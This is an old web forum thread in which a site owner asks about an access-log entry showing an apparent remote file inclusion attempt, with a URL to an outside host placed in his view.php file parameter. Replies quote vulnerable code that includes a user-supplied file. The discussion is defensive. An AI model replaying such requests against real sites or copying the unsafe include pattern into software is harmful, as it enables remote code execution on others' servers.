I was checking my log file and noticed something unusual:

78.76.64.123 - - [04/Apr/2008:19:19:35 -0500] "GET /view.php?file=http://myweddingphotos.by.ru/images? HTTP/1.1" 200 17116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
I have this on a Web page that displays a list of article titles. When you click on a title the view.php opens with that article:
<a href='view.php?file=$id'>$title</a>

But as you can see above it appears that someone has replaced the file number of the article with another website.

Can anyone tell me what is happening and how I can stop it?

Thanks.
Alan

odd, i'd also be interested what they gain by doing this
anyone?

It looks like someone found a possible vulnerability in your script, and was trying to inject something into your site. do you have any known security holes?

and by looking at the output of the target url, it looks like someone is trying to hack your site.

do you have any known security holes?
None that I know of, but then I really haven't gone looking for any because I probably would know one if I saw it.

Is there any specific thing I should be looking for?

I haven't found anything wrong with my site; when I click on a title I get what I clicked on. So I don't know if this is a failed attempt or if they have found some secretive way to use my site to propagate their filth.

Some people write terrible code like:include($_POST['file']);If you try enough sites eventually you will find one that is vulnerable and the remote code will be executed.

What specifically are they trying to do; have one of their porn pictures open on my site?

I don't use an include in conjunction with a _POST, so I guess I'm good there.

I guess as long as you don't include anything or write to db directly without proper checking you should be alright

All my database entry forms are located in an admin area, which is password protected by an htaccess file on the server.

I also use this on my post variables:
$article = mysql_real_escape_string($_POST['article']);

What specifically are they trying to do[...]?Who cares what they are trying to do? Just make your site as secure as possible (test all inputs, etc.) and then quit worrying about what makes these strangers want to vandalize or steal from your website.